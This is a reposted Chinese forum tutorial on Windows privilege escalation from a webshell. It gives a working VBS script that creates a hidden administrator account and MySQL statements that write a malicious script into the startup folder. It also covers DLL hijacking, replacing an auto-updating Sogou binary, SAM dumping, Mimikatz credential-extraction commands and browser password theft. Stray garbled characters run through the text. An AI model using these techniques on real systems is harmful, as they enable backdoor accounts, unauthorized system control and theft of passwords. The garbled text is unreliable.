原文:http://bbs.ichunqiu.com/thread-8390-1-1.html?from=jianshu
問:被刪除的儲存過程如何被恢復(fù)?
一般管理員會刪除儲存過程敛纲,在我們手動恢復(fù)儲存過程時掠兄,經(jīng)常會發(fā)生各種錯誤像云。我們要對癥下藥,根據(jù)報錯信息蚂夕,找到問題所在迅诬。
0x03? 權(quán)限繼承類提權(quán)---基于DLL劫持的WebShell提權(quán)
什么是DLL劫持
DLL劫持的原因。
1婿牍、Windows的DLL稱為動態(tài)鏈接庫侈贷,動態(tài)鏈接庫技術(shù)的本質(zhì)實(shí)際上是將可執(zhí)行文件與庫文件分離,DLL庫文件通過導(dǎo)出表提供API接口等脂,PE加載器通過exe文件的導(dǎo)入表加載相應(yīng)的DLL俏蛮,并根據(jù)exe文件中的INT查詢DLL中的函數(shù)地址,同時寫入IAT上遥。
2搏屑、當(dāng)PE加載器根據(jù)exe文件的導(dǎo)入表加載DLL文件時,它會按照程序的當(dāng)前目錄-->system32目錄-->windows目錄-->
ATH環(huán)境變量設(shè)置的目錄來依次查找要加載的DLL文件粉楚。因此辣恋,我們可以在偽造一個導(dǎo)入表同名的DLL文件,放置到exe文件的目錄中,讓PE加載器加載我們偽造的DLL文件抑党,從而實(shí)現(xiàn)劫持包警。
3、DLL的轉(zhuǎn)發(fā)器功能為我們提供了必要的條件底靠,所謂DLL轉(zhuǎn)發(fā)器功能是將對某個DLL文件的導(dǎo)出函數(shù)調(diào)用轉(zhuǎn)到另一個DLL文件的導(dǎo)出函數(shù)中害晦。類似于下面的代碼:
xxx.dll
#pragma comment(linker, "/EXPORT:MessageBoxA = user32.MessageBoxA")
除了lpk.dll劫持,常常被黑客們使用的還有針對專門的第三方軟件的個性化dll暑中。
0x04? 權(quán)限繼承類提權(quán)
開機(jī)啟動項(xiàng)提權(quán)壹瘟?
windows開機(jī)時候都會有一些開機(jī)啟動的程序,那時候啟動的程序權(quán)限都是system鳄逾,因?yàn)槭莝ystem把他們啟動的稻轨,利用這點(diǎn),我們可以將自動化腳本寫入啟動項(xiàng)雕凹,達(dá)到提權(quán)的目的
關(guān)于自動化腳本殴俱?
不會寫vbs腳本?
Set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口枚抵,綁定
Set oe=GetObject(os&"/Administrators,group") '屬性线欲,admin組
Set od=ob.Create("user","nsfocus") '建立用戶
od.SetPassword "Nsf0cus123" '設(shè)置密碼
od.SetInfo
Set of=GetObject(os&"/nsfocus",user) '得到用戶
oe.add os&"/nsfocus"
保存成*.vbs,一般cmd中使用如下格式執(zhí)行:
C:>cscript *.vbs
我們有vbs之后的事......
TIPS:
1.通常我們會主動去重啟服務(wù)器汽摹,利用遠(yuǎn)程溢出(Ms12-020)或社工手法等李丰。
2.寫入腳本的時候也常常用數(shù)據(jù)庫去寫入
*連接mysql數(shù)據(jù)庫后執(zhí)行
1.創(chuàng)建a表列名cmd并寫入文本:
create table a (cmd text);
2.一條一條執(zhí)行:
insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1 /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators 1 /add"",0) " );
3.建立好列并寫入數(shù)據(jù)了,接著就是導(dǎo)出了逼泣。
C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\這個是啟動目錄趴泌。
使用命令:select * from a into outfile "C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\a.vbs"
成功導(dǎo)出vbs到啟動目錄
替換文件提權(quán)
搜狗拼音文件夾權(quán)限漏洞
D:\Program Files (x86)\SogouInput\7.0.0.9553\PinyinUp.exe
輸入法定時聯(lián)網(wǎng),更新詞庫拉庶,檢查版本等信息嗜憔,自動執(zhí)行。替換成我們想要的:加賬號砍的,讀密碼等提權(quán)操作痹筛。舉一反三莺治,很多類似的自動運(yùn)行的應(yīng)用程序廓鞠。獲取高權(quán)限賬號之后獲取Windows管理員賬號下載系統(tǒng)的 sam文件,(“%windir%system32\config\”)然后用SamInside等軟件進(jìn)行破解谣旁,只要能拿到床佳,肯花時間,就一定可以破解榄审。
復(fù)制不出來怎么辦砌们?——“冰刃(Iceword)”
獲取FTP賬號
滲透過程中我們可能會遇到目標(biāo)服務(wù)器上有ftp軟件,如果里面保存了重要的記錄,那就是意想不到的收獲浪感,讓它把我們帶到內(nèi)網(wǎng)更深處去昔头。很多ftp軟件的登錄信息都會保存在本地,有些在軟件根目錄影兽,bin揭斧,ini等文件中,有些則需要從軟件本身導(dǎo)出峻堰。
這里我們以flashfxp為例
讀取操作系統(tǒng)賬戶的密碼
滲透過程中讹开,為了下一步滲透,我們常常會需要管理員的操作系統(tǒng)密碼捐名、數(shù)據(jù)庫密碼旦万、常用密碼等信息。獲取操作系統(tǒng)密碼已經(jīng)有很多工具可以辦到了镶蹋,那么成艘,為什么我們可以利用工具輕松獲取到操作系統(tǒng)的常用密碼呢?
通常是從內(nèi)存里抓出active賬號的 lm hash和ntlm hash
介紹幾款工具
Wce.exe
法國神器:Mimikatz
獲得緩存中的Hash值
1 cls? 清屏
2.exit? ? 退出
3.version? ? 查看mimikatz的版本
4.system::user? ? 查看當(dāng)前登錄的系統(tǒng)用戶
5.system::computer? ? 查看計算機(jī)名稱
6.process::list? ? 列出進(jìn)程
7.process::suspend 進(jìn)程名稱? ? 暫停進(jìn)程
8.process::stop 進(jìn)程名稱? ? 結(jié)束進(jìn)程
9.process::modules? ? 列出系統(tǒng)的核心模塊及所在位置
10.service::list? ? 列出系統(tǒng)的服務(wù)
11.service::remove? ? 移除系統(tǒng)的服務(wù)
12.service::start stop 服務(wù)名稱? ? 啟動或停止服務(wù)
13.privilege::list? ? 列出權(quán)限列表
14.privilege::enable? ? 激活一個或多個權(quán)限
15.privilege::debug? ? 提升權(quán)限
16.nogpo::cmd? ? 打開系統(tǒng)的cmd.exe
17.nogpo::regedit? ? 打開系統(tǒng)的注冊表
18.nogpo::taskmgr? ? 打開任務(wù)管理器
19.ts::sessions? ? 顯示當(dāng)前的會話
20.ts::processes? ? 顯示進(jìn)程和對應(yīng)的pid情況等
21.sekurlsa::wdigest? ? 獲取本地用戶信息及密碼
22.sekurlsa::tspkg? 獲取tspkg用戶信息及密碼
23.sekurlsa::logonPasswords? 獲登陸用戶信息及密碼
獲取瀏覽器中“保存下來”的密碼
chrome://settings/passwords
其實(shí)可以一次性讀出各種瀏覽器保存下來的密碼贺归,
推薦給大家一個神器的小工具:
BrowserPasswordDump
它具備了其他優(yōu)秀滲透小工具的優(yōu)點(diǎn)狰腌,可以在webshell中執(zhí)行,利用追加符號查看結(jié)果牧氮。而且輕量琼腔,速度快。
作者:i春秋論壇
鏈接:http://www.reibang.com/p/595f3511d970
來源:簡書
著作權(quán)歸作者所有踱葛。商業(yè)轉(zhuǎn)載請聯(lián)系作者獲得授權(quán)丹莲,非商業(yè)轉(zhuǎn)載請注明出處。
